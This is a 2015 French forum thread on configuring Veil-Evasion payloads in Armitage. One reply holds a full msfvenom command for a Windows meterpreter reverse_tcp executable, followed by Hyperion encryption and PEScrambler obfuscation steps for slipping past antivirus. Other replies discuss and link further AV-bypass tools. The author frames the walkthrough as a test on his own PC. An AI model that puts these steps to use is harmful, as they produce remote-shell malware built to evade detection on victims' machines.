Auteur Sujet: configuration des payload de Veil Evasion dans armitage  (Lu 8116 fois)

0 Membres et 1 Invité sur ce sujet

Hors ligne monteur1234
  • Contributeur de Kali-linux.fr
  • Membre régulier
  • *****
  • Messages: 219
  • +10/-6
configuration des payload de Veil Evasion dans armitage
« le: 10 octobre 2015 à 00:19:52 »
Bonsoir,

j'ai installé la version 2.22.1 Veil-Evasion-master :

https://github.com/Veil-Framework/Veil-Evasion

Dans armitage, j'ai installé le plugin Veil-Evasion. Quand je veux générer un payload l'option MSFPayload n'apparait pas à la place j'ai MSFVenom et option LPORT ne fonctionne pas. Je ne vois pas comment faire. J'ai même réinstallé Veil-Evasion. ???


Hors ligne monteur1234
  • Contributeur de Kali-linux.fr
  • Membre régulier
  • *****
  • Messages: 219
  • +10/-6
Re : configuration des payload de Veil Evasion dans armitage
« Réponse #1 le: 10 octobre 2015 à 00:37:08 »
Donc si j'ai bien compris, dans armitage nous ne pouvons plus utiliser MSFpayload.


Hors ligne coyotus

  • Contributeur de Kali-linux.fr
  • Membre Elite
  • *****
  • Messages: 3779
  • +266/-30
  • IN GNU WE TRUST
    • Groupe d'Utilisateurs de GNU/Linux...
Re : configuration des payload de Veil Evasion dans armitage
« Réponse #2 le: 10 octobre 2015 à 09:05:24 »
msfvenom has replaced both msfpayload and msfencode as of June 8th, 2015.

On à déjà traité du sujet....

Vous êtes le maillon faible ...
... au revoir.

Hors ligne monteur1234
  • Contributeur de Kali-linux.fr
  • Membre régulier
  • *****
  • Messages: 219
  • +10/-6
Re : configuration des payload de Veil Evasion dans armitage
« Réponse #3 le: 10 octobre 2015 à 09:11:18 »
Oui, j'ai vu par la suite en recherchant sur le forum.  ::)

Hors ligne monteur1234
  • Contributeur de Kali-linux.fr
  • Membre régulier
  • *****
  • Messages: 219
  • +10/-6
Re : Re : configuration des payload de Veil Evasion dans armitage
« Réponse #4 le: 10 octobre 2015 à 09:26:53 »
msfvenom has replaced both msfpayload and msfencode as of June 8th, 2015.

On à déjà traité du sujet....

Vous êtes le maillon faible ...
... au revoir.

Nous sommes tous le maillon faible de quelqu'un. ^^

Hors ligne monteur1234
  • Contributeur de Kali-linux.fr
  • Membre régulier
  • *****
  • Messages: 219
  • +10/-6
Re : configuration des payload de Veil Evasion dans armitage
« Réponse #5 le: 10 octobre 2015 à 20:27:12 »
Retour d'expérience, TEST sur mon réseau :

Après avoir installer Veil-Evasion, J'ai créé un exécutable pour tester mes sécurités d'un de mes PC.

Étape 1 - msfvenom

Une fois que vous avez téléchargé tout ce que vous devez,  procéder à la création de notre exécutable avec la commande suivante:

msfvenom -p windows/meterpreter/reverse_tcp -f exe -e x86/shikata_ga_nai LHOST=192.168.1.29 LPORT=6666 -i 3 --platform windows -b '\x00\x0a\xff' > test.exe
-p représente la charge utile à utiliser.
-f est le format choisi.
-e est le type de codage.
-LHOST Est l'adresse IP à laquelle se reconnecter.
-LPORT Est le port à connecter.
- Plate-forme est la plate-forme cible.
-i représente le nombre d'itérations pour qui seront appliquées à l'encodage.
-b représenter les soi-disant «mauvais caractère».

> test.exe se trouve à la sortie du dossier Veil-Evasion-master (pour moi sur le bureau)

A ce stade test.exe est détecté par mon antivirus.

Étape 2 - Hyperion

L'idée est de crypter le contenu de l'EXE avec Hyperion. Dans ce cas, le contenu sera crypté avec AES à travers cette commande:

 cp test.exe /root/Desktop/Veil-Evasion-master/tools/hyperion/Met test.exe dans le dossier hyperion

wine hyperion.exe test.exe test_1.exeSe mettre à la racine du dossier hyperion pour lancer la commande

> test_1.exe se trouve dans le dossier hyperion

A ce stade test_1.exe est encore détecté par mon antivirus

Étape 3 - PEScrumbler

L'idée à ce stade est de procéder à l'obscurcissement des techniques pour contourner l'antivirus de façon permanente par le biais de cette commande:

cp test_1.exe /root/Desktop/Veil-Evasion-master/tools/pescrambler/ Met test_1.exe dans le dossier pescrambler

wine PEScrambler.exe -i test_1.exe -o test_final.exeSe mettre à la racine du dossier PEScrambler pour lancer la commande

> test_final.exe se trouve dans le dossier PEScrambler

(Remarque vous pouvez copier et coller les EXE en mode graphique)

Ça mouline est j'ai enfin mon EXE test_final.exe que je teste avec mon antivirus. Il est détecté bon, YOUPIIIII!!!!!!!

A peine exécuté sur mon PC-TEST v'là pas que Malwarebytes me le bloque. Pas grave je désactive Malwarebytes et lance mon  test_final.exe pour que je puisse à l'aide d'Armitage prendre possession du PC. Rebelote, le SONAR de mon ANTI-VIRUS me le met en quarantaine (SONAR.Heuristic.120).

Je sais, je suis entrain de jouer au script kiddie mais c'est pour voir les protections de mes PC. La suite est de comprendre tout ces mécanismes, je sais c'est pas gagné mais je l'aurais un jour, je l'aurais... ;D

















En ligne ZeR0-@bSoLu

  • Administrateur
  • Membre Elite
  • *****
  • Messages: 3126
  • +174/-5
  • Pentest - Arch - Python - Kali
    • Kali-fr
Re : configuration des payload de Veil Evasion dans armitage
« Réponse #6 le: 22 octobre 2015 à 20:04:31 »
Hypérion n'est plus un systeme permettant de rendre FUD les exes depuis longtemps
Mess  with the bests.
Die like the rest.

Hors ligne Teeknofil
  • Contributeur de Kali-linux.fr
  • Membre sérieux
  • *****
  • Messages: 367
  • +28/-6
    • https://www.youtube.com/watch?v=R-zrnglcNuA&list=PLeu60bO1b61HE25L8Sz-cC7xjFupaSuWc
Re : configuration des payload de Veil Evasion dans armitage
« Réponse #7 le: 22 octobre 2015 à 21:35:30 »
Et veil évasion aussi a moins de coder toi même ton payload => http://packetstorm.foofus.com/papers/virus/BypassAVDynamics.pdf

Et n'y a pas que veil évasion => https://youtu.be/Sh4qP0U8_94
Hacking Debutant - Black Hat Ackademy : https://www.udemy.com/draft/2365526/?couponCode=PROMOTION

En ligne ZeR0-@bSoLu

  • Administrateur
  • Membre Elite
  • *****
  • Messages: 3126
  • +174/-5
  • Pentest - Arch - Python - Kali
    • Kali-fr
Re : configuration des payload de Veil Evasion dans armitage
« Réponse #8 le: 02 novembre 2015 à 22:22:10 »
Shellter serai plus adapté je suppose...
Mess  with the bests.
Die like the rest.